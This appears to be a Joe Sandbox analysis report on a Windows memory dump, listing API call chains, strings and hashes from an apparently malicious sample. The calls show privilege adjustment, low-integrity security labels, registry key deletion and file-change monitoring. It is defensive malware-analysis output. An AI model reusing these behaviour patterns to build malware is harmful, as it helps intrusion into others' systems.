                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000,01304081,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F424A
                                                                                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,01305084,00000104,?,?,?,?,00000000,00000000), ref: 012F4251
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Alloc$Validatememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3638075499-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                                • Part of subcall function 01305930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                                • Part of subcall function 01305930: AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                                • Part of subcall function 01305930: GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                                • Part of subcall function 01305930: CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 013059EE
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,012E4C50,?,?,012E4C50,?,00000001), ref: 01305A0B
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,012E4C50,00000010,00000000,00000000,00000000,00000001), ref: 01305A26
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,012E4C50,?,00000001), ref: 01305A37
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorToken$CurrentOpenProcessThread$AdjustCloseConvertErrorFreeHandleInfoLastLocalLookupNamedPrivilegePrivilegesSaclStringValue
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 2236266002-820036962
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 01304980: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,7763FFB0,?,?,?,?,?,012F7967,00000000,?,00000000), ref: 013049AD
                                                                                                                                                                                                                • Part of subcall function 01304980: GetProcessTimes.KERNEL32(00000000,?,?,?,012F7967,?,?,?,?,?,012F7967,00000000,?,00000000), ref: 013049CA
                                                                                                                                                                                                                • Part of subcall function 01304980: GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,012F7967,00000000,?,00000000), ref: 013049E2
                                                                                                                                                                                                                • Part of subcall function 01304980: CloseHandle.KERNEL32(00000000,?,?,?,?,?,012F7967,00000000), ref: 013049F3
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB80,?,00000000,00000000,00000000,012F7AD4), ref: 012F7828
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB80), ref: 012F7844
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F7869
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F786C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F7879
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F787C
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB80), ref: 012F7887
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapProcess$CriticalSection$HandleLeave$CloseEnterFreeInformationOpenTimesValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3901171168-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 012E3864
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00000000,9e2b3eb7a,00000000,?,00000000,?), ref: 012E3885
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 012E3893
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                              • String ID: 9e2b3eb7a$software\microsoft
                                                                                                                                                                                                              • API String ID: 3677997916-3208106814
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTickCount.KERNEL32(?,012F1163,00001000), ref: 012F412B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,012F1163,00001000), ref: 012F413C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform,?,012F1163,00001000), ref: 012F414C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressCountHandleModuleProcTick
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1545651562-3277137149
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012F43D9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F440C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F4438
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F445F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012F44DD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 863b041c5cca2a8a7694c38cb5efcbd2840f2ce11bd2e401e8d6f28b08513874
                                                                                                                                                                                                              • Instruction ID: 9d0946821204822918490f96bf934f16081805148b6efe3aeaecc2e4de33ca41
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 863b041c5cca2a8a7694c38cb5efcbd2840f2ce11bd2e401e8d6f28b08513874
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F410C70D11219AFDB10DFA9D884AEEBBF5FB48310F14852EEA15F7240D7B4A9408F91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012F4509
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F453C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F4568
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F458F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012F460D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: b93221028b303fdcb3c011c240a9dfc4f6ea8b245cac0c0169867b77463bd659
                                                                                                                                                                                                              • Instruction ID: 7c5c14545b331c0c9f3da58859f471aaa1afa26c82781271553f48d9778018e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b93221028b303fdcb3c011c240a9dfc4f6ea8b245cac0c0169867b77463bd659
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D841F1B0D11219DFDB11EFA9D884AEEBBF5FB48710F10852EE614E7240D7B4A9408F91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,012F13D9,00000000,00000000,?), ref: 012FAACC
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,013295BC,?,set_url ,?,012F1A39), ref: 012FAAF1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000012,?,?,?,?,?,012F1A39), ref: 012FAB71
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,012F1A39), ref: 012FAB78
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,-00000012,?,?,?,?,?,012F1A39), ref: 012FAB88
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,012F1A39), ref: 012FAB9D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapstrstr$AllocProcesslstrcpynmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2033102291-0
                                                                                                                                                                                                              • Opcode ID: 35c66e7a86d45cebaa5c8bbd71bb849383c3c603bc43890427727d8dc7751666
                                                                                                                                                                                                              • Instruction ID: fd73d1052ea52c3bb22a1334b9ad7d4e695b92fa08fc1878f38a8056d8e56200
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35c66e7a86d45cebaa5c8bbd71bb849383c3c603bc43890427727d8dc7751666
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6431E97291021A5BE7324E2CD884BAAFF9F9F65254F18893DEF4EC7205F621D9058390
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012F42A9
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F42DC
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F4308
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F432F
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012F43AD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 65c01f112f61b9aa45becb2c1ead1120959e51b8a0132c03a73e7d91df24daca
                                                                                                                                                                                                              • Instruction ID: 32e7d864d679d9db03b5652e39097be69da94c22e5cc362b5c956d8f55060583
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65c01f112f61b9aa45becb2c1ead1120959e51b8a0132c03a73e7d91df24daca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4841FC70D10219DFDB10DFA9D884AAEBBF5FF48710F24842EE614E7244D7B499408F91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012E13DE
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(01305460,?,?), ref: 012E141A
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(01305460,?,?), ref: 012E1446
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(01305460,?,?), ref: 012E146D
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012E1498
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 087821c19e6e9689c94ef8e2ae0f23e23603b7e4ce82a974bce2ed0dc77a6b07
                                                                                                                                                                                                              • Instruction ID: bdd143881b9eb65e4bc55ca9f014d9e52235e8eaff9deb02e1dbac8ec175a1ba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 087821c19e6e9689c94ef8e2ae0f23e23603b7e4ce82a974bce2ed0dc77a6b07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A531CDB1D11209AFDB40DFA8D885AEE7BF9FB4C314F50452AE918E7240E37499418F90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012F9539
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F956C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F9598
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012F95BF
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012F95EE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              • Opcode ID: 0e13fb68abb05c176a14a81ac22a453a259d21e214e7eb08eb1cf67b35b4c2a9
                                                                                                                                                                                                              • Instruction ID: c428189abc4ae0f79f7b696e6a6f6701343286cf815d08f94562ef64b6a9eb76
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e13fb68abb05c176a14a81ac22a453a259d21e214e7eb08eb1cf67b35b4c2a9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E531DAB1D11219AFDF40DFA8D885AEEBBF9FB48714F11812AE908E7200E77499418F90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileType.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,01309234), ref: 01308D83
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,0000002C,00000044,00000030,0000003C,?,?,?,?,?,?,?,01309234), ref: 01308DAB
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,01309234), ref: 01308DD5
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,01309234), ref: 01308DE3
                                                                                                                                                                                                              • FileTimeToDosDateTime.KERNEL32(?,01309234,?,?,?,?,?,?,?,?,01309234), ref: 01308DF5
                                                                                                                                                                                                                • Part of subcall function 01308890: GetFileType.KERNEL32(?,00000000,00000000), ref: 01308899
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileTime$Type$DateLocalPointerSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 60630809-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,012F369B,00000000,00010108,?,00000000), ref: 0130522F
                                                                                                                                                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,80000001,00000000,00000000,00000000,00000000,00000000), ref: 01305264
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0130528E
                                                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(00000104,012F369B), ref: 013052A6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 013052B2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1912718029-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012E5962
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E5995
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E59C1
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,?), ref: 012E59E8
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 012E5A04
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2886163261-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT(012E682B,012E6829,012E682A,012E682A,6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9), ref: 012E18EF
                                                                                                                                                                                                              • free.MSVCRT(012E6829), ref: 012E1918
                                                                                                                                                                                                              • exit.MSVCRT(00000001), ref: 012E1923
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,012E6829), ref: 012E1933
                                                                                                                                                                                                              • free.MSVCRT(012E6829), ref: 012E1953
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$exitmallocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2377537114-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 012F80CA
                                                                                                                                                                                                              • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 012F8108
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 012F8123
                                                                                                                                                                                                              • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 012F812A
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 012F8151
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433761119-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,013098B8,00000000,00000000,775B5CE0,?,012F3CFD,00000000,00000000,00000000,00000000,?), ref: 01308C37
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,00000000,00000000,?,?,013098B8,00000000,00000000,775B5CE0,?,012F3CFD,00000000,00000000,00000000,00000000), ref: 01308C57
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,013098B8,00000000,00000000,775B5CE0,?,012F3CFD,00000000,00000000,00000000,00000000), ref: 01308C68
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,00000000,00000000,?,?,013098B8,00000000,00000000,775B5CE0,?,012F3CFD,00000000,00000000,00000000,00000000), ref: 01308C81
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,013098B8,00000000,00000000,775B5CE0,?,012F3CFD,00000000,00000000,00000000,00000000), ref: 01308C92
                                                                                                                                                                                                                • Part of subcall function 01309680: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 013096E6
                                                                                                                                                                                                                • Part of subcall function 01309680: HeapValidate.KERNEL32(00000000), ref: 013096ED
                                                                                                                                                                                                                • Part of subcall function 01309680: GetProcessHeap.KERNEL32(00000000,?), ref: 013096FA
                                                                                                                                                                                                                • Part of subcall function 01309680: HeapFree.KERNEL32(00000000), ref: 01309701
                                                                                                                                                                                                                • Part of subcall function 01309680: GetProcessHeap.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 01309710
                                                                                                                                                                                                                • Part of subcall function 01309680: HeapValidate.KERNEL32(00000000), ref: 01309713
                                                                                                                                                                                                                • Part of subcall function 01309680: GetProcessHeap.KERNEL32(00000000,?), ref: 01309720
